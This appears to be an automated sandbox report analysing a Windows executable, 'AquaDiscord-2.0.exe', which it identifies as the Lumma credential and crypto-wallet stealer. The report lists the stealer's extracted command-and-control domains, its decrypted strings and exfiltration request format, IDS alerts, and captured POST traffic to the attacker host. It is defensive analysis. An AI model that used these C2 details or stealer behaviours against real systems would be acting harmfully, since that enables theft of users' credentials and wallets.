Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AquaDiscord-2.0.exe

Overview

General Information

Sample name:AquaDiscord-2.0.exe
Analysis ID:1582529
MD5:a15ebbc7798933dc1d436b59600f3aca
SHA1:c666f3ea96290df82eba8452262fa9c84ad8b518
SHA256:875390ef2cf52c86926147fed0ef8db6ddc8ad8422ecf5760462f2e03fc61bd3
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AquaDiscord-2.0.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\AquaDiscord-2.0.exe" MD5: A15EBBC7798933DC1D436B59600F3ACA)
    • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AquaDiscord-2.0.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\AquaDiscord-2.0.exe" MD5: A15EBBC7798933DC1D436B59600F3ACA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fancywaxxers.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "abruptyopsn.shop", "noisycuttej.shop"], "Build id": "yau6Na--899083440"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1737933383.0000000002E4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1747045883.0000000002E4F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1737540016.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: AquaDiscord-2.0.exe PID: 7400JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: AquaDiscord-2.0.exe PID: 7400JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:00.758376+010020283713Unknown Traffic192.168.2.449730104.21.16.1443TCP
                2024-12-30T20:40:01.729539+010020283713Unknown Traffic192.168.2.449731104.21.16.1443TCP
                2024-12-30T20:40:03.423030+010020283713Unknown Traffic192.168.2.449732104.21.16.1443TCP
                2024-12-30T20:40:04.622792+010020283713Unknown Traffic192.168.2.449733104.21.16.1443TCP
                2024-12-30T20:40:05.886609+010020283713Unknown Traffic192.168.2.449734104.21.16.1443TCP
                2024-12-30T20:40:07.393149+010020283713Unknown Traffic192.168.2.449735104.21.16.1443TCP
                2024-12-30T20:40:08.760534+010020283713Unknown Traffic192.168.2.449736104.21.16.1443TCP
                2024-12-30T20:40:12.789707+010020283713Unknown Traffic192.168.2.449737104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:01.241350+010020546531A Network Trojan was detected192.168.2.449730104.21.16.1443TCP
                2024-12-30T20:40:02.279785+010020546531A Network Trojan was detected192.168.2.449731104.21.16.1443TCP
                2024-12-30T20:40:13.250576+010020546531A Network Trojan was detected192.168.2.449737104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:01.241350+010020498361A Network Trojan was detected192.168.2.449730104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:02.279785+010020498121A Network Trojan was detected192.168.2.449731104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:05.223121+010020480941Malware Command and Control Activity Detected192.168.2.449733104.21.16.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop/$Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apitxtPKAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apifAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apikAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiuAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiRAvira URL Cloud: Label: malware
                Source: fancywaxxers.shopAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/LAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/api7Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/api?Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api~JAvira URL Cloud: Label: malware
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "abruptyopsn.shop", "noisycuttej.shop"], "Build id": "yau6Na--899083440"}
                Source: AquaDiscord-2.0.exeReversingLabs: Detection: 31%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.5% probability
                Source: AquaDiscord-2.0.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--899083440
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00414A9A CryptUnprotectData,2_2_00414A9A
                Source: AquaDiscord-2.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B0B6A8 FindFirstFileExW,0_2_00B0B6A8
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B0B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B0B759
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+7A9041FFh]2_2_0042207D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000000A0h]2_2_0042207D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h2_2_00420830
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [edx], al2_2_0042DA21
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]2_2_0043F23F
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_0042D2FF
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00414A9A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000002B4h]2_2_00414A9A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov esi, eax2_2_00414A9A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_00439B30
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then add ecx, edx2_2_00439B30
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp byte ptr [edi+eax+09h], 00000000h2_2_00439B30
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, di2_2_00426B80
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [edi], cx2_2_0040CEC7
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-12h]2_2_00440ED0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0Eh]2_2_00441F50
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_0040D75B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx esi, byte ptr [edx]2_2_0040D75B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+00000128h]2_2_0040D75B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+70DF14B1h]2_2_0040D75B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+486C2613h]2_2_0040D75B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then call 00440630h2_2_0043CFDB
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]2_2_00427050
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov esi, ecx2_2_00427050
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_00427050
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]2_2_00427879
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_00427030
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [edx], al2_2_0041B8D4
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ebx, eax2_2_00405910
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ebp, eax2_2_00405910
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0F72769Fh]2_2_00416914
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000130h]2_2_00416914
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 7DA30DA1h2_2_00416914
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00420130
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042B1E0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00421980
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]2_2_0043D9A0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042AA70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004162D2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov dword ptr [esp+000000A4h], 00000000h2_2_004162D2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then push edi2_2_0043EAF2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041AA81
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0041AA81
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00436320
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_0042BBCB
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042CC46
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407470
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_0042BC0F
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_0042BB79
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov edi, ecx2_2_0041CD40
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00428D4A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov ecx, eax2_2_00413D50
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov eax, 00000001h2_2_00413D50
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-38328F31h]2_2_0043D560
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042AD70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00423D10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00423D10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp al, 5Ch2_2_00402530
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]2_2_00429DF0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00423D10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00423D10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then jmp eax2_2_0040BDB9
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00423E62
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042CE63
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then test eax, eax2_2_0043A660
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h2_2_0043A660
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov edx, ecx2_2_00416E62
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7FCF7E90h]2_2_00421600
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042C63D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov edx, eax2_2_0043F6E3
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_004096B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+1Ah]2_2_004096B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]2_2_00402F10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-17h]2_2_00408FE0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B0h]2_2_00417FBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.16.1:443
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.16.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PWVB9DTBKL8T9JJGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18155Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=31SE6XOSNI1GR4O9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8776Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I24VIESSJNHBXRFHTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7QDHNTT6P9GXOFE73User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1272Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QHWUI9X4NXFQ1AP7DFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568932Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
